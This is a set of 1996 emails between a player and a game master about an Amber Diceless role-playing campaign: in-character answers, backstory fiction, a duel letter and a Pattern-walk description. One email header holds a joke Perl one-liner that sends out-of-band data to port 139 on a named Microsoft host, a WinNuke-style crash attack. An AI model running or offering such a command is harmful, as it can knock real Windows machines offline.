My Wish List
By Barb
 
1.  (chanted in an idiotic nationalistic fashion) STAMINA NUMBER ONE...STAMINA
    NUMBER ONE...STAMINA NUMBER ONE...
 
2.  A funky Logrus sword.  I can't say what kinds of features/powers I would
    like it to have since I'm unfamiliar with the options.  Actually, it
    doesn't have to be a sword.  I'd just like some kind of magical item with
    some cool power(s).
 
3.  Points saved towards advanced Logrus mastery.
                                                                                
That seems like plenty to ask for after only three game sessions.  If by some
strange chance you want more, let me know.

From: BARB@mitlns.mit.edu
Date: Mon, 29 Apr 1996 20:12:35 -0400 (EDT)
To: dkap@haven.org
Subject: Amber stuff (More Points For Me!)
 
HYPOTHETICAL (30) Answer in character please.  Answer in full, feel free to
                  take as many pages as you wish.
 
[...]
 
8. Under what circumstances would you consider torturing someone else?
 
   When that individual has made a MAJOR mistake, either through an
   attempted assassination, sabotage, or other type of attack on the
   House and/or myself.  A recent example: the assassin who tried to kill
   Jesby. That act justifies anything that might happen to him as a result.
 
[...]
 
16. For several months now, you have had an uneasy feeling and last night's
    murder confirms your suspicions.  Someone is after you and is not about
    to let your friends or staff get in the way.  Unfortunately for you,
    this person has been quite good at concealing their identity.  What is
    your next move?
                                                                                
    Since this has obviously already happened, it is quite easy to answer
    this question.  Although thankfully it was only a murder _attempt_
    on Jesby.  My plans are to extract as much information as possible from
    our prisoner.  I have a sneaking suspicion that Mikhail is behind this
    latest attempt on a Chaos House.  Someone has _got_ to know where he
    is--I believe either Corwin or Rivka can find out if necessary.
    I am going to devise a plan to send Rivka on a quest to find him.  Of
    course, this will depend on what Lord Talos finds out from the prisoner.
                                                                                
    Other houses have previous claims on Mikhail.  Even if he is killed
    before we get our chance, if House Jesby can bring him back to the
    Courts for justice, it will be a major coup that will result in several
    houses being in debt to us.
                                                                                
[...]

28. If there were scandalous rumors being told about you, how would you
    cope?

   I would have my staff investigate. Once they found the source
    of the rumor, I would summon that individual for a personal meeting.
    If I was not able to persuade the individual that it would be in their
    own best interest to cease and to set the record straight, I might
    challenge them to a duel, or start a counter-campaign of great
proportions.
    We cannot let people think they can go around saying whatever they
    want about Cathryne or House Jesby, now, can we?  It is immaterial
    whether or not the rumors are true, of course.
 
[...]
 
--
HISTORIC (15)  Answer in character please.  Answer in full, feel free to
               take as many pages as you wish.
 
[...]
 
15. When did you find out that you were of the House of Amber?  How did it
    make you feel?
 
         "That is the last I will teach you.  The rest you must find on your
    own."
         "But Suhey, I don't _feel_ ready!  Look at all the things you can
    do!  I can't do even a small fraction of them!  I _can't_ be finished!"
         "I didn't say you were finished.  I said that is all I will teach
    you.  The Logrus has many mysteries, some of which can be taught, most
    of which cannot.  You have been taught all of those skills that can be
    taught.  And you have seen first-hand how power is inherently maddening."
    I cringed involuntarily. A memory of several Black Circle kingdoms that
    were now literally black, charred holes crossed my mind; a result of
    my bout with the madness that affects everyone after they traverse the
    Logrus.
         "I will be here to give you occasional guidance, but now you must
    practice externally with the Power, and practice internally to resist
    giving in to it.  You conquered that Power-madness before; do not succumb
    to it again, regardless of what you may see or hear."  The Logrus Master
    looked me in the eye for what seemed a few eternities.  "You have more
    abilities, Cathryne, than you yet know of." Suhey turned away and started
    walking slowly back to his House.
 
    Now what was that supposed to mean?
 
        It was a warm day in the third cycle.  The sky was a beautiful amber
    with purple streaks. As I walked back from the training area toward House
    Jesby, I used the Logrus to conjure up a bottle of Bayle's Best, ice-cold.
    It took longer than I expected, and was more effort, but I had to search
    nearly all the way to Amber to find one.  Ambassador Random had been
    living in House Jesby for as long as I could remember.  I had gained an
    appreciation for the subtleties of mind-altering substances from him--
    Bayle's being one of my first introductions.  Jesby and Lady Addison had
    always discouraged me from altering my mind in any "artificial" fashion,
    Jesby insisting that one's judgment might be impaired in a critical
    situation, and Addison simply saying it wasn't healthy (perhaps being
    relatively high up in the Healer's Guild influenced her opinion).
    I usually enjoyed such diversions away from the House to avoid the
    inevitable lectures. Besides, Suhey had told me to practice using the
    Logrus, right?  What better way to do so than to pull a bottle from nearly
    all the way across reality?
        I took a long pull on the bottle and admired the sky.  Nothing better
   than a cold beer on a warm day. I ambled back toward the grounds of House
    Jesby, in no rush.  I stopped to watch a patch of Running Flowers.  They
    ran around each other in a small swarm on the ground.  As they ran, they
    shifted from red to blue depending on which side of the swarm they were
    on.  I wondered if such things were found in shadow.  I hadn't traveled
    much beyond the Black Circle kingdoms.  Ever since Jesby had named me as
    heir to House Jesby a few cycles back, I hadn't really been allowed too
far
    away from the Courts.  She never told me exactly why I was chosen as heir.
    In fact, several of my older siblings thought they were much better suited
    to the position.  Jesby had warned me that jealousy would run high.
    Shortly thereafter, she got me a fencing tutor from the Warrior's Guild.
    I never did find out if that was a precautionary or reactive measure, but
    I suspect it was the latter. I'm sure that the birth-parents of several of
    my siblings had no qualms about bumping me off and putting their birth-
    child in my place, and Jesby had found out about their plans before they
    had a chance to do anything.  These same parents had been the most vocal
in
    encouraging me to walk the Logrus, an experience that very nearly killed
    me.  Unfortunately for them, I survived. Unfortunate because they didn't,
    once I got back in one piece.
 
        I finished off the Bayle's and sent the bottle back into shadow.  As I
    neared the grounds, a House messenger came running towards me.
        "Lady Cathryne, Lady Jesby and Ambassador Random require your presence
    immediately."  Jesby and Random?  That was odd.  For the most part, they
    didn't really talk to each other except in official matters.  And at 15,
    I was really too young to be involved in major political decisions.  But
    best not to keep my Head Mother and the Amber Ambassador waiting.
        "Take me to them."
     
    He led me to one of the smaller, but formal meeting rooms.  Jesby and
    Random were there.  Jesby stood and kissed me.
        "Cathryne, my dear, your progression in your studies honors the
House."
    Random attempted to stammer something and looked away.  He was fideting,
    nervous, and strangest of all, sober.  Was this some ceremony that was
done
    upon completion of my formal Logrus training?  If so, it was odd that
    I hadn't been informed.
        "Sit down, Cathryne."  I picked the most comfortable upholstered
    chair and sat.  Jesby started pacing slowly back and forth in what I
called
    "lecturing mode". Her train dragged behind her, and I was sure it was just
    a question of time before she tripped over it. I could tell by her
    mannerisms, however, that this was a somewhat official occasion.  "You
    are aware, of course, that Lady Addison carried you."
        "Yes?"  Something was very weird.  I had known all my life that
    Addison was my birth-mother.  But I had never given it much thought.
    Like all Court children, I was raised in a group setting in my House,
    with several mothers and fathers.  It was considered healthier for
children
    to have many influences; it was hoped that the child would pick the
    best ones for his or her needs and interests.  As Head of the House,
    Jesby was also Head Mother, and had taken a special interest in my
    rearing.
        "Have you wondered why you were named heir to House Jesby?"
        "I always assumed it was because I excelled in my studies above my
        siblings."
        "There is a very good reason you did better than the rest."  Jesby
    paused, and looked meaningfully at Random.
        "Jesus Christ, I didn't want to have to do this."  Jesus Christ?
    Random had picked up a lot of strange curses in Shadow.  He sunk deeper
    into the sofa and looked like he wished it would swallow him.
        "What, are you supposed to give me an official speech now on behalf of
    Castle Amber congratulating me upon the completion of my Logrus training
   and officially recognizing me as heir?"  I asked with a smirk.  Having
    been around Random all my life, I knew he had a dislike for protocol, odd
    for an Ambassador, but it was not something that made him nervous,
usually.
        "Well, not quite."  He shot a glance at Jesby.  Jesby looked impassive
    in that way she had.  She was not about to let him out of this, whatever
it
    was.  "Um, well, I'm your father."
        "Yeah, right.  Tell me another one.  What's this really all about?"
        "No, really!  That's it!  Why would I make something like this up?"
    He looked to Jesby in desperation.
        "Yes, dear, it's true.  Random is your birth-father, with all that
    implies.  You have within you the potential to walk the Pattern, although
    I trust you will get some proper training if you decide to attempt it.
    You are of Amber as well as Chaos.  Your very existence strengthens House
    Jesby's position and ties to Castle Amber.  Now before you start
    interrupting, I must warn you not to tell anyone of this fact.  The
    Patternfall War was only a short time ago, and there are those who would
    question your loyalty, as well as that of the House.  An announcement
    will be made when the time is right.  But Random and I felt you should
    know of your true heritage as soon as you were old enough so that you
might
    prevent any possible, um, conflicts."
        Several questions fought for a moment in my mouth to see which would
    come out first.  A winner was decided, althought it was a close battle.
    "What...I...But...How many others know about this?"
        "Lady Addison, of course, and Vialle, I believe?"  Jesby looked to
    Random for confirmation.
        "I don't think my wife knows about this," Random said to the floor.
        I considered my next question carefully.  If nobody knew about this
    except for the principals and Jesby, an annoucement of my parentage could
    make a huge impact, if the timing was right.

  Then it suddenly hit me.
 
        "So I'm related to MARTIN??????  Martin, that jerk who goes around
    bragging about how the Pattern is better than the Logrus?  Martin, the
    condescending idiot who calls me 'Kathy'?  Martin, the asshole who..."
        "Hey, Martin's not all bad.  He just needs work on the proper
    etiquette for the Courts.  Say, you could help him!  You'll get to know
    each other, and maybe the kid will get some manners knocked into him!"
    Random looked pleased at this idea, the first time I'd seen him look
    anything other than ill during this whole meeting.  He fell silent for
    a few minutes.  I was nearly bursting, but Jesby silenced me with a stern
    glance.  He looked me in the eye, finally.  "Cathryne, I never meant for
    you to find out this late.  I would have taken you back to Rebma and
    let Vialle raise you, but Jesby convinced me that this would be best for
    you.  I'm afraid my fathering skills aren't the best, considerin<lost>

 model.  I hoped at least this way I could teach you about a few things,"
    he winked at me, "without completely screwing up your childhood."
        "I believe you'll want some time alone now, Cathryne," Jesby said to
    dismiss me.  She raised a hand to my imminent protests.  "All your
    questions will be answered soon enough.  But I believe you need to
    practice your Logrus skills now.  And you have etiquette lessons to sched-
    ule with Martin."
        I dutifully got up and made my way toward the door.  Princess Cathryne
    of Amber.  I kind of liked the sound of that.  If only Martin didn't come
    with the package.  What I really needed was to practice my Logrus
    summoning with some very potent substances Ran--I mean, my father had
 introduced me to.
---

From: BARB@mitlns.mit.edu
Date: Thu, 11 Apr 1996 14:17:26 -0400 (EDT)
To: dkap@haven.org
Subject: Message for Benedict
 
Dear Benedict,
 
Thank you for consenting to be my second in my upcoming duel with Julian. I
have enclosed a copy of the challenge for your review.  I have several
questions with which I believe you can assist me.  Of course, my staff and I
are at your disposal should you have any questions about the Courts' Rules
of Dueling.
 
First, his choice of weapons seems odd.  I assume he'll want to try to use
the hellhounds from Arden, or at least that's what Random believes.  Should I
attempt to find similar creatures?  I have several ideas for ways to get
around this: use shapeshifters in hound-form; I assume a gaseous or fire form
that his hounds can't injure.  Of course, it makes a difference if the hounds
are to battle each other or each participant is to battle the other's hounds.
I trust you know Julian well enough to know which would be the weaker tactical
position for him so that we may negotiate appropriately.
 
Second, as you can see from the challenge, he has named Fiona and Zacharias
as his seconds.  As I'm sure you know, Fiona is nowhere to be found.  (GM:
does this mean he can name another individual without our consent?  If so,
insert "This could be a problem if he wises up enough to name someone who
can possibly be an actual threat." If not, insert "This is to our obvious
advantage since we only have to worry about Zacharias.  It is my understand-
ing that he is not the most savvy individual, and we will probably be able
to negotiate the exact terms that best suit us.  He also has supervised
duels in past, and has a reputation for fair judgements.  I do not believe
he will favor his father unnecessarily.")
 
Third, I have no qualms about killing Julian if necessary.  House Honor
demands that all necessary steps be taken when such a situation as this
arises.  However, should I have underestimated his abilities, it would be
most inadvantageous for the House if the heir were to be killed.  Should we
negotiate a duel to the death, a duel to the death of the hounds only, or
simply first blood?  Although no retribution can be had after the result of
a fair duel, I fear that Julian will attempt it anyway if his hounds are
killed or if he is humiliated.  Since he obviously has little regard for the
rules of civility in the Courts (and elsewhere, I am told), I believe this
concern is justified.
 
Fourth, an official announcement shall be made in Amber shortly that I am
Random's daughter.  This is not public knowledge as of yet, so please do not
discuss this matter with anyone until after the announcement has been made.
Would it be to our advantage to make this announcement before or after the
duel?  Julian might have second thoughts about killing me if he believes
Random
might come after him after the fact.  On the other hand, it would add to his
humiliation when he finds out after he loses that he was beaten by his niece.
 
I expect to hear from Suhuy shortly.  If you wish to meet with him and/or
myself, please let me know and I will make the appropriate arrangements.
 
A list of Warrior Guildmaster duties and priviledges is being compiled for
you.  House Jesby is at your command should you have need of our assistance
in future.
 
-Cathryne


From dkap Mon Jul  1 21:11:23 -0400 1996
To: BARB@mitlns.mit.edu
In-reply-to: <960627153131.4020b65d@mitlns.mit.edu> (BARB@mitlns.mit.edu)
Subject: Re: Amber questions for web page, take 2
Return-Path: dkap@haven.org
Reply-To: dkap@haven.org
From: "A Page in the Life of ..." <dkap@haven.org>
 
   From: BARB@mitlns.mit.edu
 
   I would dearly like to update the Jesby page.  To do so, I need the following   info from you:
                                                                                
   What are Cathryn's various titles?  I know there are probably too many to
   mention, but I'd like to make a stab at putting them on her personal page.
                                                                                
Heir to House Jesby, Mistress of <the shadow you completely depopulated>,
Ruler of the Dark Hills of Vatren (the hereditary lands of Jesby, nominally
held by the heir to Jesby), Privy Adviser to the Ambassador from Amber.
Not that many really.
                                                                                
   What were the terms of Benedict's duel?  I know that somebody (Warlord?)
   challenged him because he shouldn't be head of the warrior's guild, or some-
   thing like that.  Specifically, who challenged him, why exactly, who were
   the seconds (I think what's on the web page is basically correct, but I'm
   not positive), and if the terms are settled, what are they?
                                                                                
Terms wasn't set yet.  Warlord was one of the seconds named by the Master
level member of the Mages guild chalenger R'karatieranon (called Kara by
his friends) his other second is Schnarst(sp?), you and Corwin were the
seconds named by Benedict.  He left it to you to inform Corwin.
 
   Are terms settled for Mandor's challenge to Bleys yet?  Ditto to above.
 
Nope.  It still isn't positive yet that it will be Bleys and/or Mandor.  It
might come out differently.  These matters of face have to be carefully
negotiated.
 
   Thanks,
   Barb

From BARB@mitlns.mit.edu  Mon Jul  8 15:40:16 1996
From: BARB@mitlns.mit.edu
Date: Mon, 8 Jul 1996 15:45:25 -0400 (EDT)
To: dkap@haven.org
Subject: conversation synopsis between Cathryn & Paprika
 
Having established that I had been mislead by the physical similarities between
Bleys and Mikhail, I returned to the House to rejoin Paprika.  She was quite
upset to hear that Bleys had recently visited the courts.  In fact, I do not
believe that I have ever seen her truly concerned about _anything_ before this
point.
 
She stated that she had made the mistake of trusting Bleys with the contents of
her mind.  After a bit of prodding, she explained that they had been in a shadowwhere she spoke the language but he didn't.  He told her that he could just
take the knowledge directly from her mind.  Unfortunately for her, he took
everything else that she knew, as well.  She said she woke up some time later
laying on a counter in a bar, with Bleys nowhere in sight.
 
With Bleys now knowing everything she knows, including past dalliances, secrets,magical techniques, etc., she decided to return to the Courts to be "easy to
find".  She assumed that Bleys would try to blackmail her.  At least, that's
what she seemed to hope for initially, since that, while an annoyance, would
at least keep Oberon from deciding to punish her for disobeying his "no-incest"
rule.  While I always knew she had a taste for Amberites, I didn't know she
_was_ one herself.  She also feared the wrath of Benedict, since she said she
had a lengthy relationship with him, and had never mentioned her heritage.
 
She has never mentioned her father before--I always assumed she was too
enamored of her mother to bother.  I asked her who her father was.  She
declined to answer, saying that she had promised to tell another, Rhiannon,
first.  She asked me what her options might be, since "you're good at this
intrigue thing."
 
First off, I suggested hiding in shadow.  Of course, as she pointed out, one
can only do that for so long, and Amberites have long memories.  My next
thought was that she could deny _truly_ knowing who her father was, since he
had not acknowledged her, and she had only Clarissa's word.  She considered
that for a moment, but felt it would be dishonest.  I mentioned that she might
let the truth be known, but have Clarissa let it _also_ be known that anyone
trying to extract punishment/revenge upon her daughter would have to answer
to her.  Paprika quickly rejected that option, saying, "This is one time when
I can't run to Mom to save me."
 
I suggested that she pay Bley's price and hope for the best.  She said that
would only work until she ran out of payment, which would inevitably take
the form of information/dirt about the family.  She said she could beg for
mercy.  I told her that she would probably be better off if she was killed
quickly, rather than be given the "mercy" of a torturous existence.  She
focused more on Benedict's reaction than Oberon's, which seemed odd to me.  She
made some comment about, "Hasn't he always wanted a daughter?  He might take
pity on me." to which I replied that Oberon had plenty of daughters, and
granddaughters, until I realized that she wasn't talking about Oberon.  I asked
if Benedict was her father, and she confirmed it.
 
I now realized the full gravity of her situation.  My first thought was that
Benedict _would_ kill her, and I told her so.  "Why?  Don't you think he could
forgive me?  I never meant for any harm to come of this.  Mom kept talking
about Amberites, and how they had this special appeal.  I wanted to see what
it was.  Since she left Benedict for Oberon, it seemed natural that I should
start there."  I told her that she had tricked him, which I doubted would
be something he could forgive _anyone_ for doing.  She only sighed and looked
fearful, knowing I was right.  I once again suggested the "ignorance" ploy,
but she said that she was concerned about his opinion of her, and that would
only make it worse.  I let her know of the awkward position she had just put
me in, considering that Benedict had named me his second for his upcoming
duel, and I had named him as second for my duel with Julian.  She apologized,
but didn't know what to do.
 
I told her that if she was truly concerned about his opinion, it would look
slightly better if she went to him and told him herself, rather than letting
the truth out through the typical rumor and innuendo lines.  The one problem
with this plan was that she would be doing this as a preemptive strike against
whatever Bleys might have in mind, rather than completely on her own.  She
agreed with this, and seemed resigned to whatever fate might befall her.
I told her I would be willing to set up a meeting with Benedict and herself.  Weagreed that a neutral shadow, with no witnesses, would be the best setting.
For Benedict's sake, I was concerned about whether this meeting should take
place before or after the duel.  We decided that I should tell him that Paprika
needed to speak with him on a serious matter (Paprika said I should choose the
wording I think best) and ask him whether he wishes it to be scheduled before
or after.
 
I feel torn, for this is the f<lost>
immaturity.  I do respect her in that after all that she's done, she still is
concerned about Benedict's opinion of her, and is taking full responsibility
for her actions.  It's ironic that just as I see something in her that I can
possibly respect, she will be killed.  And I have no doubt whatsoever that she
_will_ be killed.  If Benedict is unable to bring himself to do it, then Oberon
surely will.

In-reply-to: <970714155104.22c02e51@mitlns.mit.edu> (BARB@mitlns.mit.edu)
Subject: Re: pattern info?
Return-Path: dkap@haven.org
Reply-To: dkap@haven.org
From: "A Page in the Life of ..." <dkap@haven.org>
X-Microsoft: Just say perl -MIO::Socket -e
'IO::Socket::INET->new(PeerAddr=>"ftp.microsoft.com:139",Proto=>'tcp')->send("Die
sucker", MSG_OOB)'
***************All Things Typed To All People Belong Below Here*************
Ahh ... walking the pattern ...
 
Yes it was most ... interesting experience.
 
General Impressions:
You know what various fluids mixed together look like in a centerfuge,
right?  Well ... at first, the logrus left you with your fluids unmixing,
wiht paranoia ot the top, but other things bubbling through.  The pattern
locked down those other liquids, and now, as if everything in there was put
into stasis, with the liquids all seperating and coming out of solution,
and then stopped suddenly ... that is what it feels like over all.
 
Throught, you were hammered into many different shapes, so many that each
step was different.  Interestingly, none of the forms were anything but
bi-, quadra-, or hexta-pedal.
 
Specific Impressions:
 
First Veil - reminicing about how pleasant and enjoyable life was, before
they conspired to have you cast in the forge of the logrus.  You were
fairly certain you could do everything that you could do before the attempt
on your life, so you didn't gain anything but a knowlege of who your
enemies were.
 
Grand Curve - you get to see, in your mind's eye, each of the amberites
that you know, and get to see them all being puppeted into opposing you,
but you can't quite see who pulls the strings.  Sometimes it seems that
some of them (Zach? Bleys?) are pulling the others strings, but there are
still strings on them, being pulled.
 
Second Veil - you are haunted by the face of Stormy, constantly asking for
this or that favor, in return for rescuing you from all these far-flung
realities.  And it seems that every time he needs a favor, you go astray.
 
Little Curve - you realize that the jewel that you have is just a piece of
Dworkin's ... um ... for lack of better description ... attention.  It is
nothing in and of itself, but a means of him keeping an eye on you, and
helping you though it to make it seem useful to you.
 
Final Barrier - you feel like you are a focal battle ground between two
viral competing diseases, each trying to control every speck of your
being.  Each trying to establish dominance over the other.  The final step
was almost impossible, each side shifting you closer or further away from
that final step, as each side gains more of an upper hand.  But you
inevetibally made the last step, and it was done.  You were released like
... a puppet with cut strings.
 
Does that give you the basic outline?  Most of it is just a blurred memory
afterwards, but you are more than completely willing to never have to do
that again.  WHile some of the folks around you seem to take walking the
pattern casually, this is definitely not so for you.
 
Dave K.
 
--


